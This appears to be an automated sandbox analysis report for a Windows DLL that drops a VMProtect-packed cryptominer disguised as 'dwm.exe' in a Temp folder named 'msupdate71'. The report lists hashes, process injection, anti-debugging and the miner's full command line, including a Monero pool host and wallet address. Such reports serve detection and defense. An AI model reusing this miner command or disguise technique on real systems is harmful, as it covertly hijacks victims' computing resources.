Analysis
-
max time kernel
150s -
max time network
59s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
25-11-2022 07:59
Static task
static1
Behavioral task
behavioral1
Sample
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
Resource
win10v2004-20220901-en
General
-
Target
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
-
Size
4.6MB
-
MD5
f42201e1867d4b345373296577d40035
-
SHA1
b691363aa20b1d7681c7557a6aa40f3596416555
-
SHA256
41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea
-
SHA512
4fac587eaa45e085b210b55164f928493af98911addc429772e5a45d5b205635ff846264a07e529a5d13d20f0b7ac2042139f44a036c3a2dae6f933f307461e6
-
SSDEEP
98304:4STCsrzPn/z33xlGTvgLkbYWtYAMrbL3uxEqO0c5l:4SpzP/z378vokb8AMrbL+xEj0cT
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
dwm.exepid process 1168 dwm.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect \Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect behavioral1/memory/1168-61-0x000000013FA40000-0x000000013FDED000-memory.dmp vmprotect behavioral1/memory/1168-64-0x000000013FA40000-0x000000013FDED000-memory.dmp vmprotect behavioral1/memory/1168-66-0x000000013FA40000-0x000000013FDED000-memory.dmp vmprotect -
Loads dropped DLL 2 IoCs
Processes:
rundll32.exepid process 1260 rundll32.exe 996 -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
dwm.exepid process 1168 dwm.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepid process 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe 1260 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
dwm.exedescription pid process Token: SeLockMemoryPrivilege 1168 dwm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
rundll32.exepid process 1260 rundll32.exe 1260 rundll32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1364 wrote to memory of 1260 1364 rundll32.exe rundll32.exe PID 1364 wrote to memory of 1260 1364 rundll32.exe rundll32.exe PID 1364 wrote to memory of 1260 1364 rundll32.exe rundll32.exe PID 1364 wrote to memory of 1260 1364 rundll32.exe rundll32.exe PID 1364 wrote to memory of 1260 1364 rundll32.exe rundll32.exe PID 1364 wrote to memory of 1260 1364 rundll32.exe rundll32.exe PID 1364 wrote to memory of 1260 1364 rundll32.exe rundll32.exe PID 1260 wrote to memory of 1168 1260 rundll32.exe dwm.exe PID 1260 wrote to memory of 1168 1260 rundll32.exe dwm.exe PID 1260 wrote to memory of 1168 1260 rundll32.exe dwm.exe PID 1260 wrote to memory of 1168 1260 rundll32.exe dwm.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll,#12⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeC:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.23⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
memory/1168-57-0x0000000000000000-mapping.dmp
-
memory/1168-61-0x000000013FA40000-0x000000013FDED000-memory.dmpFilesize
3.7MB
-
memory/1168-64-0x000000013FA40000-0x000000013FDED000-memory.dmpFilesize
3.7MB
-
memory/1168-66-0x000000013FA40000-0x000000013FDED000-memory.dmpFilesize
3.7MB
-
memory/1260-54-0x0000000000000000-mapping.dmp
-
memory/1260-55-0x0000000075091000-0x0000000075093000-memory.dmpFilesize
8KB
-
memory/1260-65-0x00000000023C0000-0x000000000276D000-memory.dmpFilesize
3.7MB